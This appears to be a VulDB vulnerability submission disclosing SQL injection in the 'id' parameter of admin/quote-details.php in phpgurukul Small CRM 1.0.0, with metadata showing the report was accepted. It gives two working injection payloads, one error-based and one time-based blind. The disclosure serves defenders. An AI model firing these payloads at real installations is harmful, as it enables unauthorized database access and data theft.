| Titre | phpgurukul Small CRM in PHP 1.0.0 SQL Injection |
|---|
| Description | In the file 'quote-details.php' located at '/crm/admin/quote-details.php?id=1', there is a possibility of performing SQL injection on the '?id=' parameter. This allows attackers to inject malicious SQL code into the query. For example, if the '?id=' parameter is set to:
For error-based:
Payload: id=1' AND (SELECT 7086 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(7086=7086,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XHye
For time-based blind:
Payload: id=1' AND (SELECT 1541 FROM (SELECT(SLEEP(5)))yavg)-- LqgH |
|---|
| La source | ⚠️ https://phpgurukul.com/small-crm-php/ |
|---|
| Utilisateur | Havook (UID 71104) |
|---|
| Soumission | 26/12/2024 20:15 (il y a 1 Année) |
|---|
| Modérer | 28/12/2024 09:35 (2 days later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 289661 [PHPGurukul Small CRM 1.0 /admin/quote-details.php ID injection SQL] |
|---|
| Points | 20 |
|---|